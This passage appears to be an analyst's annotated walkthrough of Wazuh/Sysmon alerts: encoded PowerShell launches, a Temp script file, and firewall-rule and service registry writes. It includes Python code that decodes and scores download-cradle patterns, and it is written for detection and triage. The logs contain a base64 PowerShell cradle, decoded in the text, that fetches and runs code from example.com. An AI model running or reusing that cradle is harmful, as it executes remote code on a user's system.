data.win.system.processID: 3712 PID of the logging process (the Sysmon service), not the process described in the event; use eventdata.processId for that.
data.win.system.threadID: 4740 Thread inside the Sysmon service that wrote the record. Forensic noise.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel the record came from; this is the channel the Wazuh agent’s <localfile> subscribes to.
data.win.system.computer: Attacker Hostname that recorded the event; should match agent.name.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:33:12.668
ProcessGuid: {94294ddc-bc28-680a-220a-000000000e00}
ProcessId: 11012
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bc25-680a-1d0a-000000000e00}
ParentProcessId: 13852
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" Full rendered Sysmon ProcessCreate message. Same content as the eventdata.* fields below, kept for humans and for free-text search across Sysmon versions.
data.win.eventdata.utcTime: 2025-04-24 22:33:12.668 When Sysmon observed the process creation (UTC). Use this, not systemTime, for the timeline.
data.win.eventdata.processGuid: {94294ddc-bc28-680a-220a-000000000e00} Sysmon’s stable process identifier. Unlike a PID it is never reused, so pivot on it to collect this process’s network (EID3), file (EID11) and registry (EID12/13) events. The second and third segments hold the start time as a little-endian Unix timestamp: 0x680abc28 = 22:33:12Z, matching utcTime.
data.win.eventdata.processId: 11012 PID of the new process. PIDs are reused after exit, so pair it with processGuid or the timestamp.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Full path of the executable that was started: 64-bit Windows PowerShell 5.1.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Version resource of the binary; 10.0.26100 is the Windows 11 24H2 / Server 2025 build line.
data.win.eventdata.description: Windows PowerShell Description string from the PE version resource. A renamed copy of powershell.exe keeps it, which makes it a cheap masquerading check.
data.win.eventdata.product: Microsoft® Windows® Operating System Product string from the version resource.
data.win.eventdata.company: Microsoft Corporation Company string from the version resource.
data.win.eventdata.originalFileName: PowerShell.EXE Internal file name compiled into the PE. If it disagrees with the last segment of image, the binary was renamed on disk (T1036).
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA Full command line. The -EncodedCommand argument is base64 over UTF-16LE and decodes to IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'): fetch remote text and run it in memory, the classic download cradle. Note that the image path is passed twice and that the parent command line below is byte-identical, so the same encoded command re-launched itself. -NoProfile skips the user’s profile scripts, which is what an automated launcher, not a person at a prompt, typically does.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ Working directory of the new process: the user profile root, consistent with an interactive launch rather than a scheduled task or service.
data.win.eventdata.user: Attacker\\Attcker1 Account the process runs as (a local account on host Attacker).
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} Identifier of the logon session; join it to Security event 4624 to see how this user got onto the box.
data.win.eventdata.logonId: 0x26584 Logon session ID (LUID); the same value appears in Security-log events for this session.
data.win.eventdata.terminalSessionId: 1 Windows session number; 1 is the first interactive console or RDP session, 0 would be services.
data.win.eventdata.integrityLevel: Medium Token integrity level. Medium = non-elevated standard user, so whatever the downloaded script does is limited to this user’s rights until something escalates.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC Hash of the image on disk. Compare with the known-good hash for this powershell.exe build to rule out a trojanised binary.
data.win.eventdata.parentProcessGuid: {94294ddc-bc25-680a-1d0a-000000000e00} processGuid of the parent (started 0x680abc25 = 22:33:09Z). Follow it upwards to find what first launched the chain.
data.win.eventdata.parentProcessId: 13852 PID of the parent process.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Parent executable. PowerShell spawning PowerShell is what rule 92057 keys on.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA Parent’s command line, identical to the child’s, encoded payload included.
data.win.eventdata.parentUser: Attacker\\Attcker1 Account the parent ran as. Same user, so no change of security context between parent and child.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
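The alert above (and its later repeat for PID 11408) shows the encoded payload but not what it says. The following is an added example, not Wazuh or Sysmon code, that decodes the -EncodedCommand argument (base64 over UTF-16LE) from a Sysmon EID1 alert and scores the result for download-cradle patterns. The alert dictionary is constructed from the fields shown above; the indicator names, verdict labels and function names are this example’s own.

```python
"""Added example (not Wazuh or Sysmon code): decode the -EncodedCommand from a
Sysmon EID1 command line and triage it for download-cradle behaviour."""
import base64
import binascii
import re

# Constructed from the rule 92057 alert for PID 11012 above; the later alert for
# PID 11408 carries the identical command line. Backslashes are written as Python
# escapes, so the values match what json.loads() yields from the Wazuh document.
SAMPLE_ALERT = {
    "rule": {"id": "92057"},
    "data": {"win": {"eventdata": {
        "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "parentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "commandLine": (
            '"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
            '"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
            "-NoLogo -NoProfile -EncodedCommand "
            "SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4A"
            "RABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwA"
            "ZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA"
        ),
    }}},
}

# powershell.exe accepts -e, -ec, -enc and any longer prefix of -EncodedCommand,
# so match the prefix family rather than the full switch name.
ENCODED_FLAG = re.compile(r"(?<!\S)-e(?:c|n[a-z]{0,13})?\s+([A-Za-z0-9+/=]{8,})", re.IGNORECASE)

# Indicator names are this example's own labels, not Wazuh rule names.
CRADLE_INDICATORS = {
    "invoke-expression": re.compile(r"\biex\b|invoke-expression", re.IGNORECASE),
    "webclient-download": re.compile(r"net\.webclient|download(?:string|file|data)", re.IGNORECASE),
    "web-request": re.compile(r"invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b", re.IGNORECASE),
    "nested-base64": re.compile(r"frombase64string", re.IGNORECASE),
    "hidden-or-bypass": re.compile(r"-w(?:indowstyle)?\s+hidden|bypass", re.IGNORECASE),
}
URL_RE = re.compile(r"""https?://[^\s'"()<>]+""", re.IGNORECASE)


def decode_encoded_command(command_line):
    """Return the UTF-16LE text behind -EncodedCommand, or None if absent or invalid."""
    match = ENCODED_FLAG.search(command_line)
    if not match:
        return None
    b64 = match.group(1)
    b64 += "=" * (-len(b64) % 4)          # tolerate stripped padding
    try:
        raw = base64.b64decode(b64, validate=True)
    except (binascii.Error, ValueError):
        return None
    if len(raw) % 2:                      # UTF-16 payloads always have an even byte count
        return None
    return raw.decode("utf-16-le", errors="replace")


def triage_powershell_alert(alert):
    """Decode the payload, extract URLs and give an EID1 PowerShell alert a verdict."""
    ev = alert["data"]["win"]["eventdata"]
    command_line = ev.get("commandLine", "")
    decoded = decode_encoded_command(command_line)
    text = decoded if decoded is not None else command_line
    indicators = [name for name, rx in CRADLE_INDICATORS.items() if rx.search(text)]
    urls = URL_RE.findall(text)
    nested = (ev.get("image", "").lower().endswith("powershell.exe")
              and ev.get("parentImage", "").lower().endswith("powershell.exe"))
    fetches = "webclient-download" in indicators or "web-request" in indicators or bool(urls)
    if "invoke-expression" in indicators and fetches:
        verdict = "download-cradle"      # remote content executed in memory
    elif indicators:
        verdict = "suspicious"
    else:
        verdict = "review"
    return {"decoded": decoded, "indicators": indicators, "urls": urls,
            "nested_powershell": nested, "verdict": verdict}


if __name__ == "__main__":
    for key, value in triage_powershell_alert(SAMPLE_ALERT).items():
        print(f"{key}: {value}")
```

Feed it the alert document from alerts.json or the Wazuh API. The regexes only catch the plain forms; a payload that builds "IEX" from char arrays or -join fragments needs a de-obfuscation pass before scoring, which is why the decoded text, not the verdict, is what should land in the ticket.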
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 6 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534204.759894 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that emitted the event: the Sysmon driver, here reporting a file creation.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} Sysmon’s fixed provider GUID; a locale-independent filter key.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 Schema version of the FileCreate event; field layout differs between versions, so parsers should key on eventID plus version.
data.win.system.level: 4 Windows event level; 4 = Informational, which is all Sysmon ever uses.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:33:19.6224934Z When the record was written to the channel (UTC), a few milliseconds after eventdata.utcTime.
data.win.system.eventRecordID: 280237 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 PID of the Sysmon service that logged the event, not of the process that created the file (that is eventdata.processId).
data.win.system.threadID: 4740 Logging thread inside the Sysmon service. Forensic noise.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel the record came from.
data.win.system.computer: Attacker Hostname that recorded the event; should match agent.name.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:33:19.616
ProcessGuid: {94294ddc-bc2b-680a-270a-000000000e00}
ProcessId: 15028
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_5klyxkyf.pry.ps1
CreationUtcTime: 2025-04-24 22:33:19.615
User: Attacker\Attcker1" Full rendered Sysmon FileCreate message; the same content as the eventdata.* fields below.
data.win.eventdata.utcTime: 2025-04-24 22:33:19.616 When Sysmon saw the file being created (UTC), seven seconds after the encoded PowerShell launch above.
data.win.eventdata.processGuid: {94294ddc-bc2b-680a-270a-000000000e00} Sysmon GUID of the process that created the file. It is not the process from the EID1 alert above: the embedded start time (0x680abc2b = 22:33:15Z) and the GUID differ, so this is a separate powershell.exe whose own EID1 record is not among the alerts here. Pull it by this GUID to see its command line and parent.
data.win.eventdata.processId: 15028 PID of the creating process.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Executable that created the file.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_5klyxkyf.pry.ps1 Path of the new file. The __PSScriptPolicyTest_<random>.ps1 name is written by PowerShell itself at start-up to test whether an AppLocker/WDAC script policy is being enforced; it is an artefact of PowerShell starting, not a payload dropped by the script. The rule matched on the script extension plus the Temp location, so expect this alert whenever PowerShell starts on a host with such a policy. The real question is why that PowerShell instance exists.
data.win.eventdata.creationUtcTime: 2025-04-24 22:33:19.615 The file’s creation timestamp. Normally within a millisecond of utcTime, as here; a creationUtcTime far in the past on a brand-new file is the signature of timestomping (T1070.006).
data.win.eventdata.user: Attacker\\Attcker1 Account that created the file.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{B9A8F440-6AF8-49E0-98A4-35D48B0E4739} binary is: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe|Name=Google Chrome (mDNS-In)|Desc=Inbound rule for Google Chrome to allow mDNS traffic.|EmbedCtxt=Google Chrome|
🧠 What happened? A registry value was set under HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{B9A8F440-6AF8-49E0-98A4-35D48B0E4739}. That key is not a service definition: SharedAccess is the Windows Firewall / Internet Connection Sharing service, and FirewallRules is where the firewall stores its rule set. The value decodes to an enabled inbound Allow rule for UDP (Protocol=17) port 5353 (mDNS) scoped to C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe, written by svchost.exe as LOCAL SERVICE, which is how the firewall service itself commits rules.
🔍 Why it's important: Rule 92307 maps this to T1543.003 (Create or Modify System Process: Windows Service) because the path sits under ...\\Services\\, but no service was created, so for that technique this is a false positive. It still deserves a glance as a firewall change: an inbound allow rule appeared within ten seconds of the encoded PowerShell activity above. Confirm that a Chrome install or update was actually running at 22:33:22 (setup or updater process events in the same window) before closing it.
rule.description: Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{B9A8F440-6AF8-49E0-98A4-35D48B0E4739} binary is: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe|Name=Google Chrome (mDNS-In)|Desc=Inbound rule for Google Chrome to allow mDNS traffic.|EmbedCtxt=Google Chrome| Human‑readable summary of why the rule fired. Here it is templated from the registry path and value, and the “new service creation” wording is wrong for this key (see above).
rule.id: 92307 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1543.003'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Persistence', 'Privilege Escalation'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Windows Service'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 7 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid13_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534205.762662 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that emitted the event: the Sysmon driver, here reporting a registry value write.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} Sysmon’s fixed provider GUID; a locale-independent filter key.
data.win.system.eventID: 13 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 Schema version of the RegistryEvent (SetValue) event.
data.win.system.level: 4 Windows event level; 4 = Informational, which is all Sysmon ever uses.
data.win.system.task: 13 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:33:22.7768023Z When the record was written to the channel (UTC), about 6 ms after eventdata.utcTime.
data.win.system.eventRecordID: 280333 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 PID of the Sysmon service that logged the event, not of the writer (that is eventdata.processId).
data.win.system.threadID: 4740 Logging thread inside the Sysmon service. Forensic noise.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel the record came from.
data.win.system.computer: Attacker Hostname that recorded the event; should match agent.name.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Registry value set:
RuleName: -
EventType: SetValue
UtcTime: 2025-04-24 22:33:22.771
ProcessGuid: {94294ddc-ea86-67fe-3b00-000000000e00}
ProcessId: 2892
Image: C:\WINDOWS\system32\svchost.exe
TargetObject: HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{B9A8F440-6AF8-49E0-98A4-35D48B0E4739}
Details: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\Program Files\Google\Chrome\Application\chrome.exe|Name=Google Chrome (mDNS-In)|Desc=Inbound rule for Google Chrome to allow mDNS traffic.|EmbedCtxt=Google Chrome|
User: NT AUTHORITY\LOCAL SERVICE" Full rendered Sysmon RegistryEvent message; the same content as the eventdata.* fields below.
data.win.eventdata.eventType: SetValue Registry operation. EID13 is always SetValue; EID12 covers key and value create/delete, EID14 renames.
data.win.eventdata.utcTime: 2025-04-24 22:33:22.771 When the write happened (UTC).
data.win.eventdata.processGuid: {94294ddc-ea86-67fe-3b00-000000000e00} Sysmon GUID of the writing process. Its embedded start time (0x67feea86, 15 April) is about nine days before the event, i.e. a long-running service host started at boot, not something launched during this activity.
data.win.eventdata.processId: 2892 PID of the writing svchost.exe.
data.win.eventdata.image: C:\\WINDOWS\\system32\\svchost.exe The writer is a generic service host. Sysmon does not record which service inside it did the write; check this PID’s command line (the -k service group) in its EID1 record or with tasklist /svc to confirm it hosts the firewall service (MpsSvc).
data.win.eventdata.targetObject: HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{B9A8F440-6AF8-49E0-98A4-35D48B0E4739} Registry path written: a firewall rule keyed by GUID under the firewall service’s parameters, not a service key.
data.win.eventdata.details: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe|Name=Google Chrome (mDNS-In)|Desc=Inbound rule for Google Chrome to allow mDNS traffic.|EmbedCtxt=Google Chrome| Value data in the firewall rule serialisation: format version 2.33, Allow, enabled, inbound, IP protocol 17 (UDP), local port 5353, restricted to chrome.exe, named “Google Chrome (mDNS-In)”.
data.win.eventdata.user: NT AUTHORITY\\LOCAL SERVICE Account that performed the write. The firewall service runs as LOCAL SERVICE, which fits this key; reg.exe or a script writing here as an interactive user or SYSTEM would be far more interesting.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\GoogleChromeElevationService\\ImagePath binary is: \"C:\\Program Files\\Google\\Chrome\\Application\\135.0.7049.115\\elevation_service.exe\"
🧠 What happened? services.exe, running as SYSTEM, set HKLM\\System\\CurrentControlSet\\Services\\GoogleChromeElevationService\\ImagePath to \"C:\\Program Files\\Google\\Chrome\\Application\\135.0.7049.115\\elevation_service.exe\". Unlike the firewall-rule hit above, this is a genuine service registration (a Services\\<name>\\ImagePath write), and the name, path and version folder match the Google Chrome Elevation Service that the Chrome installer registers.
🔍 Why it's important: T1543.003 is a real persistence and privilege-escalation technique: a service binary runs with the service account’s rights, typically SYSTEM, at every boot. Two caveats before acting. First, the Image is services.exe because every CreateService call is executed by the Service Control Manager; this event does not tell you who requested the service. Find the requester via System log event 7045 (“A service was installed in the system”) and the EID1 process events in the same second (a Chrome setup or updater process would be the benign explanation). Second, the timing (22:33:22, within ten seconds of the encoded PowerShell above and the firewall rule) means “it looks like Chrome” is not enough: verify the Authenticode signature of the ImagePath binary and that the path actually exists on disk.
rule.description: Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\GoogleChromeElevationService\\ImagePath binary is: \"C:\\Program Files\\Google\\Chrome\\Application\\135.0.7049.115\\elevation_service.exe\" Human‑readable summary of why the rule fired; templated from the registry path and value, and accurate this time.
rule.id: 92307 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1543.003'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Persistence', 'Privilege Escalation'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Windows Service'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 8 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid13_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534205.766890 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that emitted the event: the Sysmon driver, here reporting a registry value write.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} Sysmon’s fixed provider GUID; a locale-independent filter key.
data.win.system.eventID: 13 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 Schema version of the RegistryEvent (SetValue) event.
data.win.system.level: 4 Windows event level; 4 = Informational, which is all Sysmon ever uses.
data.win.system.task: 13 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:33:22.8414954Z When the record was written to the channel (UTC), about 5 ms after eventdata.utcTime and 65 ms after the firewall-rule write above.
data.win.system.eventRecordID: 280341 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 PID of the Sysmon service that logged the event, not of the writer (that is eventdata.processId).
data.win.system.threadID: 4740 Logging thread inside the Sysmon service. Forensic noise.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel the record came from.
data.win.system.computer: Attacker Hostname that recorded the event; should match agent.name.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Registry value set:
RuleName: -
EventType: SetValue
UtcTime: 2025-04-24 22:33:22.836
ProcessGuid: {94294ddc-ea7f-67fe-0b00-000000000e00}
ProcessId: 772
Image: C:\WINDOWS\system32\services.exe
TargetObject: HKLM\System\CurrentControlSet\Services\GoogleChromeElevationService\ImagePath
Details: "C:\Program Files\Google\Chrome\Application\135.0.7049.115\elevation_service.exe"
User: NT AUTHORITY\SYSTEM" Full rendered Sysmon RegistryEvent message; the same content as the eventdata.* fields below.
data.win.eventdata.eventType: SetValue Registry operation; EID13 is always SetValue.
data.win.eventdata.utcTime: 2025-04-24 22:33:22.836 When the write happened (UTC).
data.win.eventdata.processGuid: {94294ddc-ea7f-67fe-0b00-000000000e00} Sysmon GUID of services.exe. Its embedded start time (0x67feea7f, 15 April) is boot time, as expected for the Service Control Manager.
data.win.eventdata.processId: 772 PID of services.exe.
data.win.eventdata.image: C:\\WINDOWS\\system32\\services.exe The Service Control Manager. It is the writer for every Services\\<name> key created through the CreateService API, so it says nothing about who requested the service; correlate with System event 7045 and nearby EID1 records for that.
data.win.eventdata.targetObject: HKLM\\System\\CurrentControlSet\\Services\\GoogleChromeElevationService\\ImagePath Registry path: the ImagePath of a new service entry, i.e. the binary the SCM will launch for it. Check the sibling ObjectName and Start values for the account and start type.
data.win.eventdata.details: \"C:\\Program Files\\Google\\Chrome\\Application\\135.0.7049.115\\elevation_service.exe\" Value written: a quoted absolute path under Program Files. Quoting matters; an unquoted path containing spaces here would be an unquoted-service-path weakness (T1574.009).
data.win.eventdata.user: NT AUTHORITY\\SYSTEM The SCM always writes as SYSTEM; expected.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
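Rule 92307 fired twice here on writes with very different meaning: a firewall rule under SharedAccess and a real ImagePath. The following is an added example, not Wazuh or Sysmon code, showing the split a tuned rule or a triage script should make for Sysmon EID13 writes under HKLM\System\CurrentControlSet\Services, and parsing both value formats seen in the two alerts above. The two sample events are constructed from those alerts; the function names, result keys and the unquoted-path check are this example’s own.

```python
"""Added example (not Wazuh or Sysmon code): classify Sysmon EID13 writes under
HKLM\\System\\CurrentControlSet\\Services so that firewall-rule updates are not
reported as service creation, and parse the two value formats seen above."""

SERVICES_ROOT = "HKLM\\System\\CurrentControlSet\\Services\\"
IP_PROTO = {"1": "ICMPv4", "6": "TCP", "17": "UDP", "58": "ICMPv6"}

# Constructed from the two rule 92307 alerts above, escaped as json.loads() would
# yield them from the Wazuh document.
SAMPLE_EVENTS = [
    {
        "image": "C:\\WINDOWS\\system32\\svchost.exe",
        "user": "NT AUTHORITY\\LOCAL SERVICE",
        "targetObject": "HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters"
                        "\\FirewallPolicy\\FirewallRules\\{B9A8F440-6AF8-49E0-98A4-35D48B0E4739}",
        "details": "v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353"
                   "|App=C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe"
                   "|Name=Google Chrome (mDNS-In)|Desc=Inbound rule for Google Chrome to allow mDNS traffic."
                   "|EmbedCtxt=Google Chrome|",
    },
    {
        "image": "C:\\WINDOWS\\system32\\services.exe",
        "user": "NT AUTHORITY\\SYSTEM",
        "targetObject": "HKLM\\System\\CurrentControlSet\\Services\\GoogleChromeElevationService\\ImagePath",
        "details": "\"C:\\Program Files\\Google\\Chrome\\Application\\135.0.7049.115\\elevation_service.exe\"",
    },
]


def parse_firewall_rule(details):
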